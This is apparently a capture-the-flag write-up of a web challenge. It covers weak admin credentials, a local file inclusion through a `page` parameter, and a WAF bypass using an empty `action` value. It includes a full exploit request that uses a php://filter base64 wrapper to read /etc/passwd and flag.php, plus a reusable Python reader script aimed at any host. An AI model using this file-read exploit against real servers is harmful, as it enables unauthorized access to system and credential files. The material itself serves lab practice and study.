An interesting web challenge from the finals of the 2025 black/gray-market technology countermeasures track

Published 2025-11-19


Admin backend

The weak credentials admin / admin123 get you into the backend.

A second login prompt: the same weak credentials admin / admin123 get past it as well.

Capture the request and inspect it.

The `page` parameter is user-controlled, so an arbitrary file read is the obvious guess.

Reading /etc/passwd succeeds.

Trying to read the flag runs into a WAF (a WAF that simply cannot be bypassed).

Emptying the value of the `action` parameter (keep the key, drop the value) bypasses the WAF.

Exploit request:

GET /api/logs.php?action=&page=php://filter/read=convert.base64-encode/resource=/flag.php HTTP/2
Host: eci-2zebitqp4m6ttlkfyjri.cloudeci1.ichunqiu.com:80
Cookie: PHPSESSID=3c3c951af8e524ee646a4da17a29f370
Sec-Ch-Ua-Platform: "Windows"
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.[payload omitted].BAbzi8VyinuzaCJWUycmOjC1JryED7sCVgLu_MdYTP8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36 Edg/142.0.0.0
Accept: application/json, text/plain, */*
Sec-Ch-Ua: "Chromium";v="142", "Microsoft Edge";v="142", "Not_A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://eci-2zebitqp4m6ttlkfyjri.cloudeci1.ichunqiu.com:80/admin.html
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Priority: u=1, i

flag{q4z1j08u29615b3315}
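The request above can be turned into a small reusable reader. The script below is an added example, not the challenge author's code: it reproduces the two ingredients of the exploit (the `action=` key kept with an empty value, and the `php://filter/read=convert.base64-encode` wrapper in `page`), then decodes the base64 that the filter returns and pulls the flag out of the recovered source. `HOST`, the `PHPSESSID` cookie and the bearer token are placeholders that you would copy from a logged-in browser session; the write-up does not show the response body format, so the decoder takes the raw base64 blob and a constructed sample response is used for the offline run.

```python
"""Helper for the php://filter file read from the write-up.

Added example, not the challenge author's code. HOST, the cookie and the
bearer token are placeholders: copy the real ones from a logged-in browser
session. Only read_remote() touches a server; everything else runs offline
against a constructed sample response.
"""
import base64
import re
import urllib.parse
import urllib.request

HOST = "target.example"                      # placeholder for the challenge instance
SESSION_COOKIE = "PHPSESSID=REPLACE_ME"      # placeholder, taken from the browser
BEARER_TOKEN = "REPLACE_ME"                  # placeholder JWT from the admin login

FLAG_RE = re.compile(r"flag\{[^}]*\}")


def filter_wrapper(path: str) -> str:
    """Wrap a path in php://filter so that include()/require() returns the
    file base64-encoded instead of executing it; this is what makes flag.php
    come back as source rather than as its rendered output."""
    return f"php://filter/read=convert.base64-encode/resource={path}"


def build_read_url(host: str, path: str) -> str:
    """Build the request from the write-up: `action` is kept as a key with an
    empty value (that is the WAF bypass) and `page` carries the wrapper."""
    query = urllib.parse.urlencode(
        {"action": "", "page": filter_wrapper(path)}, safe="/:="
    )
    return f"https://{host}/api/logs.php?{query}"


def decode_filter_output(body: str) -> str:
    """Decode the base64 blob the wrapper produces. Whitespace is dropped and
    padding restored in case the page wrapped the lines or trimmed the '='."""
    blob = "".join(body.split())
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-8", errors="replace")


def extract_flag(text: str):
    """Return the first flag{...} token in the decoded source, or None."""
    match = FLAG_RE.search(text)
    return match.group(0) if match else None


def read_remote(host: str, path: str) -> str:
    """Send the request with the session cookie and bearer token and return
    the decoded file. Network-only; not exercised offline."""
    req = urllib.request.Request(
        build_read_url(host, path),
        headers={
            "Cookie": SESSION_COOKIE,
            "Authorization": f"Bearer {BEARER_TOKEN}",
            "Accept": "application/json, text/plain, */*",
        },
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return decode_filter_output(resp.read().decode("utf-8", errors="replace"))


# Constructed sample: what a base64-filtered flag.php might look like. The
# flag value here is made up for the demonstration.
SAMPLE_SOURCE = '<?php\n$flag = "flag{constructed_sample_value}";\n'
SAMPLE_RESPONSE = base64.b64encode(SAMPLE_SOURCE.encode()).decode() + "\n"


def demo() -> dict:
    """Offline walk-through: build the URL, decode the sample body, pull the flag."""
    decoded = decode_filter_output(SAMPLE_RESPONSE)
    return {
        "url": build_read_url(HOST, "/flag.php"),
        "source": decoded,
        "flag": extract_flag(decoded),
    }


if __name__ == "__main__":
    result = demo()
    print(result["url"])
    print(result["source"])
    print(result["flag"])
    # Live use against a real instance: print(read_remote(HOST, "/flag.php"))
```

The base64 filter matters more than it looks: if `page` is passed to `include()`, requesting `/flag.php` directly executes the file and returns only whatever it prints, whereas `convert.base64-encode` hands back the source itself, which is why the flag is recoverable even when it only lives in a PHP variable. The same URL builder works for any readable path, so swapping `/flag.php` for `/etc/passwd` reproduces the earlier probe.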


Revisiting an old place is like carving a mark on the boat to find the dropped sword; only that one year outshines all the years since.